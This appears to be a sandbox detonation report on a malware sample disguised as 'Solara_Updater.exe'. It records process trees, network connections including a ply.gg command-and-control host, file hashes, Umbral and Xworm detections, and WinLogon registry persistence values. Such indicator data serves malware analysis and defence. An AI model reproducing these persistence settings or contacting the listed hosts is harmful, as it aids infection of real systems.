"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Users\Admin\AppData\Roaming\svhost.exe.exe
"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"
C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe
"C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.130.233:443 | discordapp.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | answer-riverside.gl.at.ply.gg | udp |
| US | 147.185.221.19:45691 | answer-riverside.gl.at.ply.gg | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | answer-riverside.gl.at.ply.gg | udp |
| US | 147.185.221.19:45691 | answer-riverside.gl.at.ply.gg | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | answer-riverside.gl.at.ply.gg | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 147.185.221.19:45691 | answer-riverside.gl.at.ply.gg | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | answer-riverside.gl.at.ply.gg | udp |
| US | 147.185.221.19:45691 | answer-riverside.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 147.185.221.19:45691 | answer-riverside.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 147.185.221.19:45691 | answer-riverside.gl.at.ply.gg | tcp |
Files
memory/2204-0-0x000007FEF5DC3000-0x000007FEF5DC4000-memory.dmp
memory/2204-1-0x0000000000370000-0x0000000000556000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Loader.exe
| MD5 | 8f77f8b13b914f358059e3f7b9ddab70 |
| SHA1 | d406a28486b4dd881c454e526e149b98c0ec8462 |
| SHA256 | c22c863186e9e86a07cdb7f214c4acede216405a09d4032a603e64931f6966e6 |
| SHA512 | b00ba88d36203e389021672b39839a172b58e492bb71afb33c9f53b9ba406a0cf5d61cb5bfe6f11dc40529be8424690737ce178d7dd4981b120ec4694f51abad |
C:\Users\Admin\AppData\Local\Temp\sol.exe
| MD5 | 25daefc71be60b76cb49fc81424d768d |
| SHA1 | 48be475dd36b433d62d4f7fed9b4d81a90122dee |
| SHA256 | 1b27df9e577ab790cafdae0b1ef25ccecdf5f7e2a1ede0d83a3ca32e2987d80a |
| SHA512 | e343905d83bdf353fe759ba5dc4de5bc2e7b1e465066bb4d09388209151e72dfd8df7da780882c533cdc3ee24933de123a8630d6a177bba0ad4d65efc39fadfe |
memory/1332-12-0x0000000000EC0000-0x0000000000EEA000-memory.dmp
memory/2204-13-0x000007FEF5DC0000-0x000007FEF67AC000-memory.dmp
memory/1332-22-0x000007FEF5DC0000-0x000007FEF67AC000-memory.dmp
C:\hostNet\rlqSVEj.vbe
| MD5 | 92408a105526970fa12ef23225de61ae |
| SHA1 | bf70e8e671c10bf85771b2b8dd4549766cf79582 |
| SHA256 | b4f3f50e48c35a2d03d9e96175722f1c4669e8529c2347f4f17377b2ad726b10 |
| SHA512 | 56df36df05187743357f3cda16f2b7791c4c760475b90f173ad3d0752475aee45e6549e062ee328f3b1f2ebd56aaa1bb9ceedb1f3200e2383455ac27e1cee043 |
C:\Users\Admin\AppData\Local\Temp\XClient.exe
| MD5 | 28ff989c1d462f567aabb9c5ba76456b |
| SHA1 | 24be926b14f64f6a9f5b8248d1618bae9a7fc0b2 |
| SHA256 | a02fb0b588d89b4ea7f83fc303af6ab00b5ec81a39cf79b2e6ec65d3a3e4c63d |
| SHA512 | 2e639e5b5480c93c7605480de40e325c0692d3834f305d7d739f3569707e01cbd5d4c75c5fe4b02616edbb5c72b5f9df6466864a2b11fc862b35b5566d51bcba |
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
| MD5 | ff8f5c2670894f74456e534b34d6a8fe |
| SHA1 | e0b35ae06f68adf07e4616da8e91bb1f935e492a |
| SHA256 | d9f3baf81271c395f4dc10e21d12bc2bfb875a8a28ede54abd54a0d8de194d37 |
| SHA512 | a58b08c3209bc196f914a82ca2b91a096988831bc45babb22ec2210303050cf03923ebf93e7a58926b8813328c672bec015cd0772f27a0192c661d83e796ffff |
memory/2020-39-0x0000000001190000-0x00000000011A6000-memory.dmp
memory/2816-42-0x0000000000BA0000-0x0000000000BE0000-memory.dmp
memory/1332-43-0x000007FEF5DC0000-0x000007FEF67AC000-memory.dmp
memory/1728-48-0x000000001B770000-0x000000001BA52000-memory.dmp
memory/1728-49-0x0000000001F50000-0x0000000001F58000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MGTQ1QPBF6XYJOYSUCSN.temp
| MD5 | b6b8bab093d4ff199935f22e50747dc0 |
| SHA1 | 19def7e3ef7a0ea0abfe3def8e2ba3c157759b54 |
| SHA256 | 45340bc56619f2e2d5cdecbd58edf4476f0ba1222de962171d3f5e3c2ee380e5 |
| SHA512 | 270a56f366df93e9a70c91b9551cc5f5beca46607e7a7f03a933cf3173c93a6c5b9f778c1fda49663edb4a3af76e6c86f90520793614be9598c5f36edfc3f24f |
memory/2380-55-0x000000001B6A0000-0x000000001B982000-memory.dmp
memory/2380-56-0x0000000001E80000-0x0000000001E88000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/720-84-0x0000000002860000-0x0000000002868000-memory.dmp
memory/720-83-0x000000001B650000-0x000000001B932000-memory.dmp
memory/268-95-0x000000001B6E0000-0x000000001B9C2000-memory.dmp
memory/268-96-0x0000000002330000-0x0000000002338000-memory.dmp
memory/2328-108-0x000000001B650000-0x000000001B932000-memory.dmp
memory/2328-109-0x0000000002220000-0x0000000002228000-memory.dmp
memory/2828-126-0x0000000000320000-0x0000000000360000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | 577f27e6d74bd8c5b7b0371f2b1e991c |
| SHA1 | b334ccfe13792f82b698960cceaee2e690b85528 |
| SHA256 | 0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9 |
| SHA512 | 944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c |
memory/2704-175-0x000000001B790000-0x000000001BA72000-memory.dmp
memory/2704-177-0x0000000002290000-0x0000000002298000-memory.dmp
memory/2040-197-0x0000000001350000-0x0000000001390000-memory.dmp
memory/2204-199-0x000007FEF5DC0000-0x000007FEF67AC000-memory.dmp
memory/2440-226-0x00000000012C0000-0x00000000012D6000-memory.dmp
memory/2300-239-0x0000000000280000-0x000000000045E000-memory.dmp
memory/2300-241-0x00000000005E0000-0x00000000005EE000-memory.dmp
memory/2300-243-0x0000000000610000-0x000000000062C000-memory.dmp
memory/2300-245-0x0000000000640000-0x0000000000658000-memory.dmp
memory/2300-247-0x00000000005F0000-0x00000000005F8000-memory.dmp
memory/2300-249-0x0000000000600000-0x000000000060C000-memory.dmp
C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe
| MD5 | 8ccc428a5a6f6139dc191d332f3de08b |
| SHA1 | ae550a8fb67deeb1350020aa3fe8b0339db6bc71 |
| SHA256 | 801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749 |
| SHA512 | 1479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e |
memory/1668-293-0x00000000003D0000-0x00000000005AE000-memory.dmp
memory/2080-298-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
memory/1548-307-0x00000000027A0000-0x00000000027A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\e7lG3Dof0tiB7u3
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\Users\Admin\AppData\Local\Temp\0oxgHCygznUf7EF
| MD5 | c9ff7748d8fcef4cf84a5501e996a641 |
| SHA1 | 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9 |
| SHA256 | 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988 |
| SHA512 | d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73 |
memory/2396-377-0x0000000000310000-0x0000000000350000-memory.dmp
memory/2276-415-0x0000000001EE0000-0x0000000001EE8000-memory.dmp
memory/2276-414-0x000000001B760000-0x000000001BA42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mq0WKMOC4v9hs1b\Display\Display.png
| MD5 | ecf765e18eded64fe607e5c21deade47 |
| SHA1 | 2ec02f6dece315077da9e97174e04293ee07b85c |
| SHA256 | 53df102706734d46e13097748fa21e808b3bf422bc6407c39446629617d8e0c3 |
| SHA512 | 5db8b57c2021dcc555aaca5ca919426ff060166335c58e8bd5f6f763c0da89fcb04d02414df909b793bdcacd0bd863c8af9dacb48c0f31fe502a3209a71bf298 |
memory/2720-431-0x0000000000F50000-0x0000000000F90000-memory.dmp
memory/2972-495-0x0000000000280000-0x0000000000288000-memory.dmp
memory/2704-496-0x0000000000970000-0x0000000000B4E000-memory.dmp
memory/1080-516-0x00000000001E0000-0x0000000000220000-memory.dmp
memory/2152-609-0x0000000000D40000-0x0000000000D48000-memory.dmp
memory/1764-610-0x0000000000080000-0x000000000025E000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-19 16:14
Reported
2024-05-19 16:17
Platform
win10v2004-20240426-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\", \"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\", \"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\wscript.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\", \"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\wscript.exe\", \"C:\\Program Files (x86)\\Microsoft\\Solara_Updater.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\Users\\Default User\\wscript.exe\", \"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\wscript.exe\", \"C:\\Program Files (x86)\\Microsoft\\Solara_Updater.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
Umbral
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Loader.exe | N/A |
